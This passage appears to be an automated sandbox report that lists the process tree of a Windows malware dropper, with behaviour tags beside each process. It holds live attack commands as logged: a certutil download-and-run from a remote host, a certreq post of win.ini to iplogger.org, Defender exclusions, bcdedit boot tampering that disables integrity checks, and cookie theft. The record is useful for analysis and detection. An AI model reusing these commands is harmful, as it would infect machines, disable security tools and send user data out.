- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:936
-
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:4284
-
-
C:\Users\Admin\AppData\Roaming\1615300158282.exe"C:\Users\Admin\AppData\Roaming\1615300158282.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300158282.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4380
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:4288
-
-
C:\Users\Admin\AppData\Roaming\1615300163140.exe"C:\Users\Admin\AppData\Roaming\1615300163140.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300163140.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2448
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:4516
-
-
C:\Users\Admin\AppData\Roaming\1615300168374.exe"C:\Users\Admin\AppData\Roaming\1615300168374.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300168374.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4104
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5780
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵PID:4688
-
-
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4272
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"6⤵PID:4508
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:4596
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:2668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"4⤵
- Executes dropped EXE
PID:4412 -
C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4548 -
C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe" 1 3.1615299952.6047857028a05 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\5CSM0HTZD2\multitimer.exe" 2 3.1615299952.6047857028a057⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\eyd4o1xdhet\3zghjt3qmqe.exe"C:\Users\Admin\AppData\Local\Temp\eyd4o1xdhet\3zghjt3qmqe.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4992 -
C:\Users\Admin\AppData\Local\Temp\is-2T2A8.tmp\3zghjt3qmqe.tmp"C:\Users\Admin\AppData\Local\Temp\is-2T2A8.tmp\3zghjt3qmqe.tmp" /SL5="$E0048,870426,780800,C:\Users\Admin\AppData\Local\Temp\eyd4o1xdhet\3zghjt3qmqe.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\is-KHP4U.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-KHP4U.tmp\winlthst.exe" test1 test110⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ov5apjvh1a1\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ov5apjvh1a1\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1096 -
C:\Users\Admin\AppData\Local\Temp\is-C7D2A.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-C7D2A.tmp\vpn.tmp" /SL5="$2025C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ov5apjvh1a1\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4348 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:4176
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:6040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:6344
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:6424
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:4188
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:5488
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hc1xx1gjznk\so1y2dml4mg.exe"C:\Users\Admin\AppData\Local\Temp\hc1xx1gjznk\so1y2dml4mg.exe" testparams8⤵
- Executes dropped EXE
PID:4648 -
C:\Users\Admin\AppData\Roaming\zey1h4bwsk5\2oo0xwkdvse.exe"C:\Users\Admin\AppData\Roaming\zey1h4bwsk5\2oo0xwkdvse.exe" /VERYSILENT /p=testparams9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6084 -
C:\Users\Admin\AppData\Local\Temp\is-PI1VM.tmp\2oo0xwkdvse.tmp"C:\Users\Admin\AppData\Local\Temp\is-PI1VM.tmp\2oo0xwkdvse.tmp" /SL5="$202FA,552809,216064,C:\Users\Admin\AppData\Roaming\zey1h4bwsk5\2oo0xwkdvse.exe" /VERYSILENT /p=testparams10⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:6112
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bg1e0gouxyz\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\bg1e0gouxyz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5084 -
C:\Users\Admin\AppData\Local\Temp\is-E6LV1.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-E6LV1.tmp\IBInstaller_97039.tmp" /SL5="$102BE,14441882,721408,C:\Users\Admin\AppData\Local\Temp\bg1e0gouxyz\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3472 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:4276
-
-
C:\Users\Admin\AppData\Local\Temp\is-308V1.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-308V1.tmp\{app}\chrome_proxy.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4484 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-308V1.tmp\{app}\chrome_proxy.exe"11⤵PID:4512
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:5016
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\liz4pgk53d2\dxial0iierr.exe"C:\Users\Admin\AppData\Local\Temp\liz4pgk53d2\dxial0iierr.exe" 57a764d042bf88⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:224 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\06NZJ10HT4\06NZJ10HT.exe" 57a764d042bf8 & exit9⤵PID:6044
-
C:\Program Files\06NZJ10HT4\06NZJ10HT.exe"C:\Program Files\06NZJ10HT4\06NZJ10HT.exe" 57a764d042bf810⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rrxlku00dbb\vict.exe"C:\Users\Admin\AppData\Local\Temp\rrxlku00dbb\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4344
-
-
C:\Users\Admin\AppData\Local\Temp\ougnz4kr2zb\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\ougnz4kr2zb\chashepro3.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4232
-
-
C:\Users\Admin\AppData\Local\Temp\czthzce305i\chqta5qgtz3.exe"C:\Users\Admin\AppData\Local\Temp\czthzce305i\chqta5qgtz3.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:4200 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "chqta5qgtz3.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\czthzce305i\chqta5qgtz3.exe" & exit9⤵PID:3164
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "chqta5qgtz3.exe" /f10⤵
- Kills process with taskkill
PID:5944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uznogmtigcn\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\uznogmtigcn\askinstall24.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4244 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:5460
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:5596
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vbdgs0pl1yt\app.exe"C:\Users\Admin\AppData\Local\Temp\vbdgs0pl1yt\app.exe" /8-238⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Wispy-Frog"9⤵PID:5180
-
-
C:\Program Files (x86)\Wispy-Frog\7za.exe"C:\Program Files (x86)\Wispy-Frog\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵PID:5072
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Wispy-Frog\app.exe" -map "C:\Program Files (x86)\Wispy-Frog\WinmonProcessMonitor.sys""9⤵PID:6028
-
C:\Program Files (x86)\Wispy-Frog\app.exe"C:\Program Files (x86)\Wispy-Frog\app.exe" -map "C:\Program Files (x86)\Wispy-Frog\WinmonProcessMonitor.sys"10⤵PID:4144
-
-
-
C:\Program Files (x86)\Wispy-Frog\7za.exe"C:\Program Files (x86)\Wispy-Frog\7za.exe" e -p154.61.71.51 winamp.7z9⤵PID:6232
-
-
C:\Program Files (x86)\Wispy-Frog\app.exe"C:\Program Files (x86)\Wispy-Frog\app.exe" /8-239⤵PID:6524
-
C:\Program Files (x86)\Wispy-Frog\app.exe"C:\Program Files (x86)\Wispy-Frog\app.exe" /8-2310⤵PID:2924
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵PID:5548
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵PID:5884
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2311⤵PID:5592
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F12⤵
- Creates scheduled task(s)
PID:4660
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F12⤵
- Creates scheduled task(s)
PID:6128
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"12⤵PID:5676
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER13⤵
- Modifies boot configuration data using bcdedit
PID:188
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:13⤵
- Modifies boot configuration data using bcdedit
PID:4716
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:13⤵
- Modifies boot configuration data using bcdedit
PID:5268
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows13⤵
- Modifies boot configuration data using bcdedit
PID:6528
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe13⤵
- Modifies boot configuration data using bcdedit
PID:6708
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe13⤵
- Modifies boot configuration data using bcdedit
PID:5420
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 013⤵
- Modifies boot configuration data using bcdedit
PID:4672
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn13⤵
- Modifies boot configuration data using bcdedit
PID:5708
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 113⤵
- Modifies boot configuration data using bcdedit
PID:3300
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}13⤵
- Modifies boot configuration data using bcdedit
PID:5324
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast13⤵
- Modifies boot configuration data using bcdedit
PID:6684
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 013⤵
- Modifies boot configuration data using bcdedit
PID:5720
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}13⤵
- Modifies boot configuration data using bcdedit
PID:6980
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy13⤵
- Modifies boot configuration data using bcdedit
PID:5176
-
-
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v12⤵
- Modifies boot configuration data using bcdedit
PID:5772
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe12⤵PID:4632
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"12⤵PID:6912
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)13⤵PID:5400
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)14⤵PID:4856
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4204 -
C:\Users\Admin\AppData\Roaming\197.tmp.exe"C:\Users\Admin\AppData\Roaming\197.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4480 -
C:\Users\Admin\AppData\Roaming\197.tmp.exe"C:\Users\Admin\AppData\Roaming\197.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4724
-
-
-
C:\Users\Admin\AppData\Roaming\37C.tmp.exe"C:\Users\Admin\AppData\Roaming\37C.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4492 -
C:\Users\Admin\AppData\Roaming\37C.tmp.exe"{path}"6⤵
- Executes dropped EXE
PID:5660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:3008
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5332
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
- Executes dropped EXE
PID:5232 -
C:\ProgramData\6375841.70"C:\ProgramData\6375841.70"5⤵
- Executes dropped EXE
PID:5096
-
-
C:\ProgramData\5061240.55"C:\ProgramData\5061240.55"5⤵
- Executes dropped EXE
PID:5560
-
-
C:\ProgramData\6846628.75"C:\ProgramData\6846628.75"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4520 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:2220
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3948 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5612
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:2108
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E0AC3252AD6411817BD2BC1A6D8DA43A C2⤵
- Loads dropped DLL
PID:3940
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:5112
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2512
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:4884
-
C:\Users\Admin\AppData\Local\Temp\is-TE5OO.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-TE5OO.tmp\vict.tmp" /SL5="$10304,870426,780800,C:\Users\Admin\AppData\Local\Temp\rrxlku00dbb\vict.exe" /VERYSILENT /id=5351⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3636 -
C:\Users\Admin\AppData\Local\Temp\is-H19J0.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-H19J0.tmp\wimapi.exe" 5352⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5848
-
-
C:\Users\Admin\AppData\Local\Temp\is-V7861.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-V7861.tmp\chashepro3.tmp" /SL5="$90054,1478410,58368,C:\Users\Admin\AppData\Local\Temp\ougnz4kr2zb\chashepro3.exe" /VERYSILENT1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4636 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"2⤵PID:4496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:3052
-
-
C:\Program Files (x86)\JCleaner\Brava.exe"C:\Program Files (x86)\JCleaner\Brava.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4696
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"2⤵
- Executes dropped EXE
PID:4708 -
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"3⤵PID:4760
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"3⤵PID:448
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\22⤵PID:4812
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\23⤵
- Suspicious use of FindShellTrayWindow
PID:5204
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:4756
-
-
C:\Program Files (x86)\JCleaner\mex.exe"C:\Program Files (x86)\JCleaner\mex.exe"2⤵
- Executes dropped EXE
PID:4876 -
C:\Program Files (x86)\JCleaner\mex.exe"{path}"3⤵PID:5240
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\mex.exe"4⤵PID:6704
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:6784
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"2⤵PID:3976
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\8faddea007144b0ba944a1f88a1fffaa /t 3108 /p 26241⤵PID:5688
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5132
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5940
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6356
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6496
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6564
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{3e9aaf2d-b98e-3b45-b2a8-78125a854c56}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:6612
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"2⤵PID:6896
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6932
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:6952
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:5500
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:6336
-
